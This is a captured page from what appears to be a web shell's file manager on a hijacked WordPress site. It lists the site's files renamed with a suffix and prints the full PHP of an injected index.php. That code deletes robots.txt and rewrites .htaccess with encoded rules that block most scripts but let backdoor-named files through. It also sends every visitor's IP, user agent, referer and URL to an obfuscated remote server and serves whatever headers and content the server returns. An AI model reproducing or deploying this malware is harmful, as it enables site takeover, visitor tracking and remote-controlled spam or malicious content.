Gecko [ fap.ae ]

Name	Size	Permission	Date
.well-known__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-08 07:42
5c712d98	[ DIR ]	drwxr-xr-x	2026-04-08 12:38
cgi-bin__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-11 08:35
images__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-08 07:42
wp-admin__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-08 07:42
wp-content__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-11 08:35
wp-includes__3bcaf66	[ DIR ]	drwxr-xr-x	2026-04-08 07:42
.htaccess	498 B	-rw-r--r--	2026-04-08 07:00
doc_2025-02-25_08-17-28.htaccess__3bcaf66	231 B	-rw-r--r--	2026-04-08 06:54
error_log	364 B	-rw-r--r--	2026-04-08 07:29
error_log__3bcaf66	8.62 KB	-rw-r--r--	2026-04-08 07:00
htaccess.th__3bcaf66	172 B	-rw-r--r--	2026-04-08 06:54
index.php	17.47 KB	-rw-r--r--	2026-04-13 06:25
index.php__3bcaf66	2.65 KB	-rw-r--r--	2026-04-08 07:00
license.txt__3bcaf66	19.45 KB	-rw-r--r--	2026-04-08 06:54
php.ini__3bcaf66	40 B	-rw-r--r--	2026-04-08 07:00
readme.html__3bcaf66	7.23 KB	-rw-r--r--	2026-04-08 06:54
robots.txt__3bcaf66	102 B	-rw-r--r--	2026-04-07 01:20
wp-activate.php__3bcaf66	7.04 KB	-rw-r--r--	2026-04-08 06:54
wp-blog-header.php__3bcaf66	351 B	-rw-r--r--	2026-04-08 06:54
wp-comments-post.php__3bcaf66	2.28 KB	-rw-r--r--	2026-04-08 06:54
wp-config-sample.php__3bcaf66	2.94 KB	-rw-r--r--	2026-04-08 06:54
wp-config.php__3bcaf66	3.54 KB	-rw-r--r--	2026-04-07 01:20
wp-cron.php__3bcaf66	5.41 KB	-rw-r--r--	2026-04-08 06:54
wp-links-opml.php__3bcaf66	2.44 KB	-rw-r--r--	2026-04-08 06:54
wp-load.php__3bcaf66	3.7 KB	-rw-r--r--	2026-04-08 06:54
wp-login.php__3bcaf66	48.17 KB	-rw-r--r--	2026-04-08 06:54
wp-mail.php__3bcaf66	8.34 KB	-rw-r--r--	2026-04-08 06:54
wp-settings.php__3bcaf66	24.41 KB	-rw-r--r--	2026-04-08 06:54
wp-signup.php__3bcaf66	33.54 KB	-rw-r--r--	2026-04-08 06:54
wp-trackback.php__3bcaf66	4.77 KB	-rw-r--r--	2026-04-08 06:54
xmlrpc.php__3bcaf66	3.16 KB	-rw-r--r--	2026-04-08 06:54

Rename

<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzIwNjAtY2g0LXY1MDIucmFrdXRlbjY0anAuY2xpY2s='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>